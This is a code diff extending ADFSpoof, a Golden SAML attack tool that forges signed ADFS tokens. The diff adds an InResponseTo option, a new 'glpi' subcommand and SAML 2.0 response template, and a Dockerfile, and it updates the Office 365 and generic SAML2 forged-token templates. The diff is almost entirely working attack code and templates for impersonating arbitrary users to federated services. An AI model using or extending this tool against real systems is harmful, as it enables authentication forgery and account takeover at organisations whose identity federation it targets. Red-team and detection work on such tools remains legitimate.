dockerfile + patch template o365

ADFSpoof.py

@@ -21,6 +21,7 @@ def parse_args():
     arg_parser.add_argument('-v', '--verbose', help='Verbose Output', default=False)
     arg_parser.add_argument('--assertionid', help='AssertionID string. Defaults to a random string', default=random_string())
     arg_parser.add_argument('--responseid', help='The Response ID. Defaults to random string', default=random_string())
+    arg_parser.add_argument('--inresponseto', help='The InResponseTo attribute (ID from the SP AuthnRequest)', default=None)
     arg_parser.add_argument('-s', '--server', help='Identifier for the federation service. Usually the fqdn of the server. e.g. sts.example.com DO NOT include HTTPS://')
     arg_parser.add_argument('-a', '--algorithm', help='SAML signing algorithm to use', default='rsa-sha256')
     arg_parser.add_argument('-d', '--digest', help='SAML digest algorithm to use', default='sha256')
@@ -49,6 +50,12 @@ def parse_args():
     parser_generic_saml2.add_argument('--assertions', help='The XML assertions for the SAML token', default=None)
     parser_generic_saml2.add_argument('--config', help='JSON file containing generic args', default=None)
 
+    parser_generic_glpi = subparsers.add_parser('glpi')
+    parser_generic_glpi.add_argument('--endpoint', help='The destination/recipient attribute for SAML 2.0 token. Where the SAML token will be sent.', default=None)
+    parser_generic_glpi.add_argument('--nameid', help='The NameIdentifier attribute value', default=None)
+    parser_generic_glpi.add_argument('--rpidentifier', help='The Identifier for the Relying Party', default=None)
+    parser_generic_glpi.add_argument('--config', help='JSON file containing generic args', default=None)
+
     parser_dump = subparsers.add_parser('dump')
     parser_dump.add_argument('--path', help='Filepath where the signing token will be output.', default='token.pfx')
 
@@ -137,7 +144,8 @@ def get_module_params(command):
             'AdfsServer': args.server,
             'SubjectConfirmationTime': subject_confirmation_time,
             'ResponseID': args.responseid,
-            'AuthnInstant': authn_instant
+            'AuthnInstant': authn_instant,
+            'InResponseTo': args.inresponseto or ''
         }
 
         if args.config:
@@ -158,6 +166,35 @@ def get_module_params(command):
             }
         params.update(saml2_params)
         name_identifier = "ID"
+
+    elif command == "glpi":
+        params = {
+            'TokenCreated': token_created,
+            'TokenExpires': token_expires,
+            'AdfsServer': args.server,
+            'AssertionID': args.assertionid,
+            'SubjectConfirmationTime': subject_confirmation_time,
+            'ResponseID': args.responseid,
+            'AuthnInstant': authn_instant,
+            'InResponseTo': args.inresponseto or ''
+        }
+
+        if args.config:
+            with open(args.config, 'r') as config_file:
+                data = config_file.read()
+            try:
+                glpi_params = json.loads(data)
+            except json.JSONDecodeError:
+                sys.stderr.write("Could not parse JSON config file for SAML2 token creation. Quitting.\n")
+                die()
+        else:
+            glpi_params = {
+                'SamlEndpoint': args.endpoint,
+                'NameID': args.nameid,
+                'RPIdentifier': args.rpidentifier,
+            }
+        params.update(glpi_params)
+        name_identifier = "ID"
 
     return params, name_identifier
 
@@ -180,6 +217,7 @@ def output_token(token, command):
     if args.command != 'dump':
         params, id_attribute = get_module_params(args.command)
 
+        print("=================",repr(id_attribute))
         token = signer.sign_XML(params, id_attribute, args.algorithm, args.digest)
 
         if args.output:

Dockerfile

@@ -0,0 +1,10 @@
+FROM python:3.11.12-slim
+
+COPY . /app
+WORKDIR /app
+
+
+RUN pip install --no-cache-dir -r requirements.txt
+
+
+ENTRYPOINT ["python", "/app/ADFSpoof.py"]

templates/glpi.xml

@@ -0,0 +1,28 @@
+<samlp:Response ID="$ResponseID" Version="2.0" IssueInstant="$TokenCreated" Destination="$SamlEndpoint" Consent="urn:oasis:names:tc:SAML:2.0:consent:unspecified"
+    xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
+    <Issuer xmlns="urn:oasis:names:tc:SAML:2.0:assertion">http://$AdfsServer/adfs/services/trust</Issuer>
+    <samlp:Status>
+        <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" />
+    </samlp:Status>
+    <Assertion ID="$AssertionID" IssueInstant="$TokenCreated" Version="2.0"
+        xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
+        <Issuer>http://$AdfsServer/adfs/services/trust</Issuer>
+        <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#" Id="placeholder"></ds:Signature>
+        <Subject>
+            <NameID>$NameID</NameID>
+            <SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
+                <SubjectConfirmationData NotOnOrAfter="$SubjectConfirmationTime" Recipient="$SamlEndpoint"/>
+            </SubjectConfirmation>
+        </Subject>
+        <Conditions NotBefore="$TokenCreated" NotOnOrAfter="$TokenExpires">
+            <AudienceRestriction>
+                <Audience>$RPIdentifier</Audience>
+            </AudienceRestriction>
+        </Conditions>
+        <AuthnStatement AuthnInstant="$AuthnInstant">
+            <AuthnContext>
+                <AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</AuthnContextClassRef>
+            </AuthnContext>
+        </AuthnStatement>
+    </Assertion>
+</samlp:Response>

templates/o365.xml

@@ -1 +1 @@
-<t:RequestSecurityTokenResponse xmlns:t="http://schemas.xmlsoap.org/ws/2005/02/trust"><t:Lifetime><wsu:Created xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">$TokenCreated</wsu:Created><wsu:Expires xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">$TokenExpires</wsu:Expires></t:Lifetime><wsp:AppliesTo xmlns:wsp="http://schemas.xmlsoap.org/ws/2004/09/policy"><wsa:EndpointReference xmlns:wsa="http://www.w3.org/2005/08/addressing"><wsa:Address>urn:federation:MicrosoftOnline</wsa:Address></wsa:EndpointReference></wsp:AppliesTo><t:RequestedSecurityToken><saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:1.0:assertion" MajorVersion="1" MinorVersion="1" AssertionID="$AssertionID" Issuer="http://$AdfsServer/adfs/services/trust" IssueInstant="$TokenCreated"><saml:Conditions NotBefore="$TokenCreated" NotOnOrAfter="$TokenExpires"><saml:AudienceRestrictionCondition><saml:Audience>urn:federation:MicrosoftOnline</saml:Audience></saml:AudienceRestrictionCondition></saml:Conditions><saml:AttributeStatement><saml:Subject><saml:NameIdentifier Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">$NameIdentifier</saml:NameIdentifier><saml:SubjectConfirmation><saml:ConfirmationMethod>urn:oasis:names:tc:SAML:1.0:cm:bearer</saml:ConfirmationMethod></saml:SubjectConfirmation></saml:Subject><saml:Attribute AttributeName="UPN" AttributeNamespace="http://schemas.xmlsoap.org/claims"><saml:AttributeValue>$UPN</saml:AttributeValue></saml:Attribute><saml:Attribute AttributeName="ImmutableID" AttributeNamespace="http://schemas.microsoft.com/LiveID/Federation/2008/05"><saml:AttributeValue>$NameIdentifier</saml:AttributeValue></saml:Attribute><saml:Attribute xmlns:a="http://schemas.xmlsoap.org/ws/2009/09/identity/claims" AttributeName="insidecorporatenetwork" AttributeNamespace="http://schemas.microsoft.com/ws/2012/01" a:OriginalIssuer="CLIENT CONTEXT"><saml:AttributeValue xmlns:tn="http://www.w3.org/2001/XMLSchema" xmlns:b="http://www.w3.org/2001/XMLSchema-instance" b:type="tn:boolean">false</saml:AttributeValue></saml:Attribute><saml:Attribute AttributeName="authnmethodsreferences" AttributeNamespace="http://schemas.microsoft.com/claims"><saml:AttributeValue>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AttributeValue></saml:Attribute></saml:AttributeStatement><saml:AuthenticationStatement AuthenticationMethod="urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport" AuthenticationInstant="$TokenCreated"><saml:Subject><saml:NameIdentifier Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">$NameIdentifier</saml:NameIdentifier><saml:SubjectConfirmation><saml:ConfirmationMethod>urn:oasis:names:tc:SAML:1.0:cm:bearer</saml:ConfirmationMethod></saml:SubjectConfirmation></saml:Subject></saml:AuthenticationStatement><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#" Id="placeholder"></ds:Signature></saml:Assertion></t:RequestedSecurityToken><t:TokenType>urn:oasis:names:tc:SAML:1.0:assertion</t:TokenType><t:RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</t:RequestType><t:KeyType>http://schemas.xmlsoap.org/ws/2005/05/identity/NoProofKey</t:KeyType></t:RequestSecurityTokenResponse>
+<t:RequestSecurityTokenResponse xmlns:t="http://schemas.xmlsoap.org/ws/2005/02/trust"><t:Lifetime><wsu:Created xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">$TokenCreated</wsu:Created><wsu:Expires xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">$TokenExpires</wsu:Expires></t:Lifetime><wsp:AppliesTo xmlns:wsp="http://schemas.xmlsoap.org/ws/2004/09/policy"><wsa:EndpointReference xmlns:wsa="http://www.w3.org/2005/08/addressing"><wsa:Address>urn:federation:MicrosoftOnline</wsa:Address></wsa:EndpointReference></wsp:AppliesTo><t:RequestedSecurityToken><saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:1.0:assertion" MajorVersion="1" MinorVersion="1" AssertionID="$AssertionID" Issuer="http://$AdfsServer/adfs/services/trust/" IssueInstant="$TokenCreated"><saml:Conditions NotBefore="$TokenCreated" NotOnOrAfter="$TokenExpires"><saml:AudienceRestrictionCondition><saml:Audience>urn:federation:MicrosoftOnline</saml:Audience></saml:AudienceRestrictionCondition></saml:Conditions><saml:AttributeStatement><saml:Subject><saml:NameIdentifier Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">$NameIdentifier</saml:NameIdentifier><saml:SubjectConfirmation><saml:ConfirmationMethod>urn:oasis:names:tc:SAML:1.0:cm:bearer</saml:ConfirmationMethod></saml:SubjectConfirmation></saml:Subject><saml:Attribute AttributeName="UPN" AttributeNamespace="http://schemas.xmlsoap.org/claims"><saml:AttributeValue>$UPN</saml:AttributeValue></saml:Attribute><saml:Attribute AttributeName="ImmutableID" AttributeNamespace="http://schemas.microsoft.com/LiveID/Federation/2008/05"><saml:AttributeValue>$NameIdentifier</saml:AttributeValue></saml:Attribute><saml:Attribute xmlns:a="http://schemas.xmlsoap.org/ws/2009/09/identity/claims" AttributeName="insidecorporatenetwork" AttributeNamespace="http://schemas.microsoft.com/ws/2012/01" a:OriginalIssuer="CLIENT CONTEXT"><saml:AttributeValue xmlns:tn="http://www.w3.org/2001/XMLSchema" xmlns:b="http://www.w3.org/2001/XMLSchema-instance" b:type="tn:boolean">false</saml:AttributeValue></saml:Attribute><saml:Attribute AttributeName="authnmethodsreferences" AttributeNamespace="http://schemas.microsoft.com/claims"><saml:AttributeValue>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AttributeValue></saml:Attribute></saml:AttributeStatement><saml:AuthenticationStatement AuthenticationMethod="urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport" AuthenticationInstant="$TokenCreated"><saml:Subject><saml:NameIdentifier Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">$NameIdentifier</saml:NameIdentifier><saml:SubjectConfirmation><saml:ConfirmationMethod>urn:oasis:names:tc:SAML:1.0:cm:bearer</saml:ConfirmationMethod></saml:SubjectConfirmation></saml:Subject></saml:AuthenticationStatement><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#" Id="placeholder"></ds:Signature></saml:Assertion></t:RequestedSecurityToken><t:TokenType>urn:oasis:names:tc:SAML:1.0:assertion</t:TokenType><t:RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</t:RequestType><t:KeyType>http://schemas.xmlsoap.org/ws/2005/05/identity/NoProofKey</t:KeyType></t:RequestSecurityTokenResponse>

templates/saml2.xml

@@ -1 +1,29 @@
-<samlp:Response ID="$ResponseID" Version="2.0" IssueInstant="$TokenCreated" Destination="$SamlEndpoint" Consent="urn:oasis:names:tc:SAML:2.0:consent:unspecified" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"><Issuer xmlns="urn:oasis:names:tc:SAML:2.0:assertion">http://$AdfsServer/adfs/services/trust</Issuer><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" /></samlp:Status><Assertion ID="$AssertionID" IssueInstant="$TokenCreated" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"><Issuer>http://$AdfsServer/adfs/services/trust</Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#" Id="placeholder"></ds:Signature><Subject><NameID Format="$NameIDFormat">$NameID</NameID><SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><SubjectConfirmationData NotOnOrAfter="$SubjectConfirmationTime" Recipient="$SamlEndpoint"/></SubjectConfirmation></Subject><Conditions NotBefore="$TokenCreated" NotOnOrAfter="$TokenExpires"><AudienceRestriction><Audience>$RPIdentifier</Audience></AudienceRestriction></Conditions><AttributeStatement>$Assertions</AttributeStatement><AuthnStatement AuthnInstant="$AuthnInstant" SessionIndex="$AssertionID"><AuthnContext><AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</AuthnContextClassRef></AuthnContext></AuthnStatement></Assertion></samlp:Response>
+<samlp:Response ID="$ResponseID" InResponseTo="$InResponseTo" Version="2.0" IssueInstant="$TokenCreated" Destination="$SamlEndpoint" Consent="urn:oasis:names:tc:SAML:2.0:consent:unspecified"
+    xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
+    <Issuer xmlns="urn:oasis:names:tc:SAML:2.0:assertion">http://$AdfsServer/adfs/services/trust</Issuer>
+    <samlp:Status>
+        <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" />
+    </samlp:Status>
+    <Assertion ID="$AssertionID" IssueInstant="$TokenCreated" Version="2.0"
+        xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
+        <Issuer>http://$AdfsServer/adfs/services/trust</Issuer>
+        <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#" Id="placeholder"></ds:Signature>
+        <Subject>
+            <NameID Format="$NameIDFormat">$NameID</NameID>
+            <SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
+                <SubjectConfirmationData InResponseTo="$InResponseTo" NotOnOrAfter="$SubjectConfirmationTime" Recipient="$SamlEndpoint"/>
+            </SubjectConfirmation>
+        </Subject>
+        <Conditions NotBefore="$TokenCreated" NotOnOrAfter="$TokenExpires">
+            <AudienceRestriction>
+                <Audience>$RPIdentifier</Audience>
+            </AudienceRestriction>
+        </Conditions>
+        <AttributeStatement>$Assertions</AttributeStatement>
+        <AuthnStatement AuthnInstant="$AuthnInstant" SessionIndex="$AssertionID">
+            <AuthnContext>
+                <AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</AuthnContextClassRef>
+            </AuthnContext>
+        </AuthnStatement>
+    </Assertion>
+</samlp:Response>